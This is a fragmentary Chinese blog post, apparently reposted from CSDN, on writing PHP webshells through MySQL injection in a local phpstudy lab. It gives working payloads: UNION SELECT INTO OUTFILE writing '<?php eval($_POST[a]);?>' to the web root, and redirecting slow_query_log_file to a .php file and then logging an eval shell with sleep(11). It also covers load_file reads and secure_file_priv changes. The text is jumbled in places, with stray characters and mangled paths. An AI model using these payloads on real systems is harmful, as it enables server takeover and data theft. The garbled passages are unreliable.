本文介绍: D:\phpstudy_pro\WWWd.php———》shell路径。那么如果把my.ini内的参数secure_file_priv设置在c盘目录下。,即没设置允许操作的目录,所以没法导出到文件。我发现如果sleep的少,并不会记录到日志中去。我们可以发现都是sleep(11)的被记录了。结果看了半天这个my.ini是被隐藏的大哥。我们可以发现我们就只能在c盘进行操作。可以看一下我们的日志d.php。我们可以看到2.txt被写入。用蚁剑发现连接成功了v。可以看到有了d.php。
root高权限读写注入
load_file 读取文件
load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客
终于读出来了
此时参数值系统变量 secure_file_priv已经被修改
原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。
into_outfile 写入文件
?param=0′ union select 1,2,3,4,’a‘ into outfile ‘e:/2.txt‘–+
?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+
先
太
那么如果把my.ini内的参数secure_file_priv设置在c盘目录下
secure_file_priv=c:/
mysql写马
set global slow_query_log_file=’D:\phpstudy_pro\WWWd.php‘
D:\phpstudy_pro\WWWd.php———》shell路径
select '<?php eval($ POST[a])?>' or SLEEP(1);
但是!!!
Mysql注入写Shell读文件总结 – FreeBuf网络安全行业门户
select "<?php eval($_POST[aaaaaa]);?>" or sleep(11); 
可以看一下我们的日志d.php
蚁剑连一下看看
原文地址:https://blog.csdn.net/2202_75317918/article/details/134804362
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_48680.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
